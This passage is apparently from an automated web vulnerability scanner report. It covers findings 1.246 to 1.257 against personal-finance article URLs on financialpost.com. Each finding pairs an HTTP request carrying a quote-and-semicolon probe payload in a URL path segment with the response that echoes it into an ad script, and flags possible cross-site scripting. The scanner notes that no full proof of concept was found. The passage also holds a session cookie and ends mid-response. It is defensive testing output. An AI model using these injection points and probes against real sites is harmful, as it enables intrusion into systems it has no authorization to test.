GET /personal-finance1558b'%3bef88a93e159/Christmas+hardest+time+sell+best+time/3995600/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 80706
Expires: Sun, 19 Dec 2010 03:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance1558b';ef88a93e159/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance1558b';ef88a93e159;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34922104?">
...[SNIP]...

1.246. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74102'%3b83caa696128 was submitted in the REST URL parameter 3. This input was echoed as 74102';83caa696128 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Christmas+hardest+time+sell+best+time/399560074102'%3b83caa696128/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70553
Expires: Sun, 19 Dec 2010 03:11:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/christmas-hardest-time-sell-best-time/399560074102';83caa696128/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=christmas-hardest-time-sell-best-time;kw=399560074102';83caa696128;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+su
...[SNIP]...

1.247. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6b22'%3b240f9e32f57 was submitted in the REST URL parameter 4. This input was echoed as a6b22';240f9e32f57 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Christmas+hardest+time+sell+best+time/3995600/a6b22'%3b240f9e32f57 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44637


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/christmas%20hardest%20time%20sell%20best%20time/3995600/a6b22';240f9e32f57/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=christmas%20hardest%20time%20sell%20best%20time;kw=3995600;kw=a6b22';240f9e32f57;kw=npo;kw=fpo;tile='+dartad_tile+';'+
...[SNIP]...

1.248. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820b5'%3be19f1fa9fd was submitted in the REST URL parameter 1. This input was echoed as 820b5';e19f1fa9fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance820b5'%3be19f1fa9fd/Does+diabetes+qualify+disability+credit/3994512/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79835
Expires: Sun, 19 Dec 2010 03:10:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance820b5';e19f1fa9fd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance820b5';e19f1fa9fd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24161567?">
...[SNIP]...

1.249. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce248'%3bd1f8406fe84 was submitted in the REST URL parameter 3. This input was echoed as ce248';d1f8406fe84 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Does+diabetes+qualify+disability+credit/3994512ce248'%3bd1f8406fe84/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71495
Expires: Sun, 19 Dec 2010 03:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/does-diabetes-qualify-disability-credit/3994512ce248';d1f8406fe84/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=does-diabetes-qualify-disability-credit;kw=3994512ce248';d1f8406fe84;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+
...[SNIP]...

1.250. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa5eb'%3b0000bb3f5a6 was submitted in the REST URL parameter 4. This input was echoed as aa5eb';0000bb3f5a6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Does+diabetes+qualify+disability+credit/3994512/aa5eb'%3b0000bb3f5a6 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44637


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/does%20diabetes%20qualify%20disability%20credit/3994512/aa5eb';0000bb3f5a6/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=does%20diabetes%20qualify%20disability%20credit;kw=3994512;kw=aa5eb';0000bb3f5a6;kw=npo;kw=fpo;tile='+dartad_tile+';'+
...[SNIP]...

1.251. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca37c'%3bd9a5baaf693 was submitted in the REST URL parameter 1. This input was echoed as ca37c';d9a5baaf693 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-financeca37c'%3bd9a5baaf693/Elderly+brain+makes+riskier+investments/3983726/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81437
Expires: Sun, 19 Dec 2010 03:11:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financeca37c';d9a5baaf693/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financeca37c';d9a5baaf693;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32472151?">
...[SNIP]...

1.252. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 565bd'%3b35fb979a5ac was submitted in the REST URL parameter 3. This input was echoed as 565bd';35fb979a5ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726565bd'%3b35fb979a5ac/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64674
Expires: Sun, 19 Dec 2010 03:11:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/elderly-brain-makes-riskier-investments/3983726565bd';35fb979a5ac/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=elderly-brain-makes-riskier-investments;kw=3983726565bd';35fb979a5ac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+
...[SNIP]...

1.253. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a48af'%3b7e65cea9d7b was submitted in the REST URL parameter 4. This input was echoed as a48af';7e65cea9d7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726/a48af'%3b7e65cea9d7b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38793


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/elderly%20brain%20makes%20riskier%20investments/3983726/a48af';7e65cea9d7b/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=elderly%20brain%20makes%20riskier%20investments;kw=3983726;kw=a48af';7e65cea9d7b;kw=npo;kw=fpo;tile='+dartad_tile+';'+
...[SNIP]...

1.254. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Retired+forgotten/3953088/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3bd2'%3b4a915ea03ce was submitted in the REST URL parameter 1. This input was echoed as a3bd2';4a915ea03ce in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-financea3bd2'%3b4a915ea03ce/Retired+forgotten/3953088/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83722
Expires: Sun, 19 Dec 2010 03:10:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financea3bd2';4a915ea03ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financea3bd2';4a915ea03ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34415371?">
...[SNIP]...

1.255. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Retired+forgotten/3953088/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55b32'%3b7da1471c85e was submitted in the REST URL parameter 3. This input was echoed as 55b32';7da1471c85e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Retired+forgotten/395308855b32'%3b7da1471c85e/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69813
Expires: Sun, 19 Dec 2010 03:11:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/retired-forgotten/395308855b32';7da1471c85e/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=retired-forgotten;kw=395308855b32';7da1471c85e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70920
...[SNIP]...

1.256. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Retired+forgotten/3953088/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4833e'%3bb4e5a632b37 was submitted in the REST URL parameter 4. This input was echoed as 4833e';b4e5a632b37 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance/Retired+forgotten/3953088/4833e'%3bb4e5a632b37 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44021


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/retired%20forgotten/3953088/4833e';b4e5a632b37/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=retired%20forgotten;kw=3953088;kw=4833e';b4e5a632b37;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord
...[SNIP]...

1.257. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Warning+Asset+bubbles+underway/3976343/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e57'%3bca94ef828cc was submitted in the REST URL parameter 1. This input was echoed as 13e57';ca94ef828cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance13e57'%3bca94ef828cc/Warning+Asset+bubbles+underway/3976343/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82115
Expires: Sun, 19 Dec 2010 03:11:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:43 GMT
Connection: close


